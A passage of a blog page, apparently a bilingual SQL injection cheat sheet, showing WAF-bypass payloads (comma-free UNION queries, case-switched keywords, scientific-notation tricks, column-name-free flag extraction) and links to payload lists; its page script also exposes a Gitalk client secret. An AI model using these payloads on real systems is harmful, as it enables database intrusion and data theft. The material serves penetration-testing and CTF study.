<h3 id="No-commas-bypass"><a href="#No-commas-bypass" class="headerlink" title="No commas bypass"></a>No commas bypass</h3><p>No Comma - bypass using OFFSET, FROM and JOIN</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">LIMIT 0,1         -&gt; LIMIT 1 OFFSET 0</span><br><span class="line">SUBSTR(&#x27;SQL&#x27;,1,1) -&gt; SUBSTR(&#x27;SQL&#x27; FROM 1 FOR 1).</span><br><span class="line">SELECT 1,2,3,4    -&gt; UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d</span><br></pre></td></tr></table></figure>

<h3 id="Generic-Bypasses"><a href="#Generic-Bypasses" class="headerlink" title="Generic Bypasses"></a>Generic Bypasses</h3><p>Blacklist using keywords - bypass using uppercase&#x2F;lowercase</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">AND</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span>#</span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">AnD</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span>#</span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">aNd</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span>#</span><br></pre></td></tr></table></figure>

<p>Blacklist using keywords case insensitive - bypass using an equivalent operator</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">AND   -&gt; &amp;&amp; -&gt; %26%26</span><br><span class="line">OR    -&gt; || -&gt; %7C%7C</span><br><span class="line">=     -&gt; LIKE,REGEXP,RLIKE, not &lt; and not &gt;</span><br><span class="line">&gt; X   -&gt; not between 0 and X</span><br><span class="line">WHERE -&gt; HAVING --&gt; LIMIT X,1 -&gt; group_concat(CASE(table_schema)When(database())Then(table_name)END) -&gt; group_concat(if(table_schema=database(),table_name,null))</span><br></pre></td></tr></table></figure>

<h3 id="Scientific-Notation-WAF-bypass"><a href="#Scientific-Notation-WAF-bypass" class="headerlink" title="Scientific Notation WAF bypass"></a>Scientific Notation WAF bypass</h3><p>You can find a more in depth explaination of this trick in <a target="_blank" rel="noopener" href="https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/">gosecure blog</a>.<br>Basically you can use the scientific notation in unexpected ways for the WAF to bypass it:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">-1&#x27; or 1.e(1) or &#x27;1&#x27;=&#x27;1</span><br><span class="line">-1&#x27; or 1337.1337e1 or &#x27;1&#x27;=&#x27;1</span><br><span class="line">&#x27; or 1.e(&#x27;&#x27;)=</span><br></pre></td></tr></table></figure>

<h3 id="Bypass-Column-Names-Restriction【限制】"><a href="#Bypass-Column-Names-Restriction【限制】" class="headerlink" title="Bypass Column Names Restriction【限制】"></a>Bypass Column Names <strong>Restriction【限制】</strong></h3><p>First of all, notice that if the <strong>original query and the table where you want to extract the flag from have the same amount of columns</strong> you might just do: <code>0 UNION SELECT * FROM flag</code></p>
<p>It’s possible to <strong>access the third column of a table without using its name</strong> using a query like the following: <code>SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;</code>, so in an sqlinjection this would looks like:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># This is an example with 3 columns that will extract the column number 3</span></span><br><span class="line">-1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;</span><br></pre></td></tr></table></figure>

<p>Or using a <strong>comma bypass</strong>:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># In this case, it&#x27;s extracting the third value from a 4 values table and returning 3 values in the &quot;union select&quot;</span></span><br><span class="line">-1 union select * from (select 1)a <span class="built_in">join</span> (select 2)b <span class="built_in">join</span> (select F.3 from (select * from (select 1)q <span class="built_in">join</span> (select 2)w <span class="built_in">join</span> (select 3)e <span class="built_in">join</span> (select 4)r union select * from flag <span class="built_in">limit</span> 1 offset 5)F)c</span><br></pre></td></tr></table></figure>

<p>This trick was taken from <a target="_blank" rel="noopener" href="https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/">https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/</a></p>
<h3 id="WAF-bypass-suggester-tools"><a href="#WAF-bypass-suggester-tools" class="headerlink" title="WAF bypass suggester tools"></a>WAF bypass suggester tools</h3><p>url&#x3D;”<a target="_blank" rel="noopener" href="https://github.com/m4ll0k/Atlas">https://github.com/m4ll0k/Atlas</a></p>
<h2 id="Other-Guides"><a href="#Other-Guides" class="headerlink" title="Other Guides"></a>Other Guides</h2><ul>
<li><a target="_blank" rel="noopener" href="https://sqlwiki.netspi.com/">https://sqlwiki.netspi.com/</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection">https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection</a></li>
</ul>
<h2 id="Brute-Force-Detection-List"><a href="#Brute-Force-Detection-List" class="headerlink" title="Brute-Force Detection List"></a>Brute-Force Detection List</h2><p>url&#x3D;”<a target="_blank" rel="noopener" href="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt&quot;">https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt&quot;</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/SQLi/" rel="tag"># SQLi</a>
              <a href="/tags/%E6%B3%A8%E5%85%A5/" rel="tag"># 注入</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/03/19/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E4%B9%8Baxis%E5%BC%B1%E5%8F%A3%E4%BB%A4%E5%85%A5%E4%BE%B5/" rel="prev" title="应急响应之axis弱口令入侵">
      <i class="fa fa-chevron-left"></i> 应急响应之axis弱口令入侵
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/03/26/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B9%8B%E7%9F%AD%E6%96%87%E4%BB%B6%E5%90%8D%E6%BC%8F%E6%B4%9E/" rel="next" title="渗透测试之短文件名漏洞">
      渗透测试之短文件名漏洞 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL-Injection"><span class="nav-number">1.</span> <span class="nav-text">SQL Injection</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AFSQL%E6%B3%A8%E5%85%A5%EF%BC%9F"><span class="nav-number">1.1.</span> <span class="nav-text">什么是SQL注入？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%85%A5%E5%8F%A3%E7%82%B9%E6%A3%80%E6%B5%8B"><span class="nav-number">1.2.</span> <span class="nav-text">入口点检测</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%A8%E9%87%8A%E7%AC%A6"><span class="nav-number">1.2.1.</span> <span class="nav-text">注释符</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%A9%BA%E7%99%BD%E5%AD%97%E7%AC%A6"><span class="nav-number">1.2.2.</span> <span class="nav-text">空白字符</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9F%BA%E4%BA%8E%E9%80%BB%E8%BE%91%E8%BF%90%E7%AE%97%E7%A1%AE%E8%AE%A4-SQLi"><span class="nav-number">1.2.3.</span> <span class="nav-text">基于逻辑运算确认 SQLi</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9F%BA%E4%BA%8E%E5%93%8D%E5%BA%94%E6%97%B6%E9%97%B4%E7%A1%AE%E8%AE%A4-SQLi"><span class="nav-number">1.2.4.</span> <span class="nav-text">基于响应时间确认 SQLi</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%A1%AE%E8%AE%A4%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B1%BB%E5%9E%8B"><span class="nav-number">1.2.5.</span> <span class="nav-text">确认数据库类型</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9F%BA%E4%BA%8E-union-%E7%9A%84%E6%B3%A8%E5%85%A5"><span class="nav-number">1.3.</span> <span class="nav-text">基于 union 的注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%A3%80%E6%B5%8B%E5%AD%97%E6%AE%B5%E6%95%B0"><span class="nav-number">1.3.1.</span> <span class="nav-text">检测字段数</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Order-x2F-Group-by"><span class="nav-number">1.3.1.1.</span> <span class="nav-text">Order&#x2F;Group by</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#UNION-SELECT"><span class="nav-number">1.3.1.2.</span> <span class="nav-text">UNION SELECT</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8F%90%E5%8F%96%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D-%E8%A1%A8%E5%90%8D-%E5%92%8C-%E5%AD%97%E6%AE%B5%E5%90%8D"><span class="nav-number">1.3.2.</span> <span class="nav-text">提取数据库名,表名 和 字段名</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9F%BA%E4%BA%8E%E9%9A%90%E8%97%8F%E7%9A%84-union-%E6%B3%A8%E5%85%A5"><span class="nav-number">1.4.</span> <span class="nav-text">基于隐藏的 union 注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploiting-Error-based"><span class="nav-number">1.5.</span> <span class="nav-text">Exploiting Error based</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploiting-Blind-SQLi"><span class="nav-number">1.6.</span> <span class="nav-text">Exploiting Blind SQLi</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploiting-Error-Blind-SQLi"><span class="nav-number">1.7.</span> <span class="nav-text">Exploiting Error Blind SQLi</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploiting-Time-Based-SQLi"><span class="nav-number">1.8.</span> <span class="nav-text">Exploiting Time Based SQLi</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Stacked-Queries"><span class="nav-number">1.9.</span> <span class="nav-text">Stacked Queries</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Out-of-band-Exploitation"><span class="nav-number">1.10.</span> <span class="nav-text">Out of band Exploitation</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Out-of-band-data-exfiltration-via-XXE"><span class="nav-number">1.10.1.</span> <span class="nav-text">Out of band data exfiltration via XXE</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Automated-Exploitation"><span class="nav-number">1.11.</span> <span class="nav-text">Automated Exploitation</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Tech-specific-info"><span class="nav-number">1.12.</span> <span class="nav-text">Tech specific info</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Authentication-bypass"><span class="nav-number">1.13.</span> <span class="nav-text">Authentication bypass</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Authentication-Bypass-Raw-MD5"><span class="nav-number">1.13.1.</span> <span class="nav-text">Authentication Bypass (Raw MD5)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Hash-Authentication-Bypass"><span class="nav-number">1.13.2.</span> <span class="nav-text">Hash Authentication Bypass</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#GBK-Authentication-Bypass"><span class="nav-number">1.13.3.</span> <span class="nav-text">GBK Authentication Bypass</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Polyglot-injection%E3%80%90%E5%A4%9A%E8%AF%AD%E5%A2%83%E6%B3%A8%E5%85%A5%E3%80%91-multicontext"><span class="nav-number">1.13.4.</span> <span class="nav-text">Polyglot injection【多语境注入】 (multicontext)</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Insert-Statement"><span class="nav-number">1.14.</span> <span class="nav-text">Insert Statement</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Modify-password-of-existing-object-x2F-user"><span class="nav-number">1.14.1.</span> <span class="nav-text">Modify password of existing object&#x2F;user</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL-Truncation-Attack"><span class="nav-number">1.14.1.1.</span> <span class="nav-text">SQL Truncation Attack</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#MySQL-Insert-time-based-checking"><span class="nav-number">1.14.2.</span> <span class="nav-text">MySQL Insert time based checking</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ON-DUPLICATE-KEY-UPDATE"><span class="nav-number">1.14.3.</span> <span class="nav-text">ON DUPLICATE KEY UPDATE</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Extract-information"><span class="nav-number">1.14.4.</span> <span class="nav-text">Extract information</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Creating-2-accounts-at-the-same-time"><span class="nav-number">1.14.4.1.</span> <span class="nav-text">Creating 2 accounts at the same time</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Using-decimal-or-hexadecimal"><span class="nav-number">1.14.4.2.</span> <span class="nav-text">Using decimal or hexadecimal</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Routed-SQL-injection"><span class="nav-number">1.15.</span> <span class="nav-text">Routed SQL injection</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#WAF-Bypass"><span class="nav-number">1.16.</span> <span class="nav-text">WAF Bypass</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#No-spaces-bypass"><span class="nav-number">1.16.1.</span> <span class="nav-text">No spaces bypass</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#No-commas-bypass"><span class="nav-number">1.16.2.</span> <span class="nav-text">No commas bypass</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Generic-Bypasses"><span class="nav-number">1.16.3.</span> <span class="nav-text">Generic Bypasses</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Scientific-Notation-WAF-bypass"><span class="nav-number">1.16.4.</span> <span class="nav-text">Scientific Notation WAF bypass</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Bypass-Column-Names-Restriction%E3%80%90%E9%99%90%E5%88%B6%E3%80%91"><span class="nav-number">1.16.5.</span> <span class="nav-text">Bypass Column Names Restriction【限制】</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#WAF-bypass-suggester-tools"><span class="nav-number">1.16.6.</span> <span class="nav-text">WAF bypass suggester tools</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Other-Guides"><span class="nav-number">1.17.</span> <span class="nav-text">Other Guides</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Brute-Force-Detection-List"><span class="nav-number">1.18.</span> <span class="nav-text">Brute-Force Detection List</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">sing</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives">
          <span class="site-state-item-count">24</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
        <span class="site-state-item-count">37</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">sing</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : '6e8bfc081de57f042466',
      clientSecret: '9b93268b65af7c8c4e8af7a5a1a539f01671b723',
      repo        : 'sing3r.github.io',
      owner       : 'sing3r',
      admin       : ['sing3r'],
      id          : '5bbf8ec904fdfb50fc00908b8032f36e',
        language: '',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
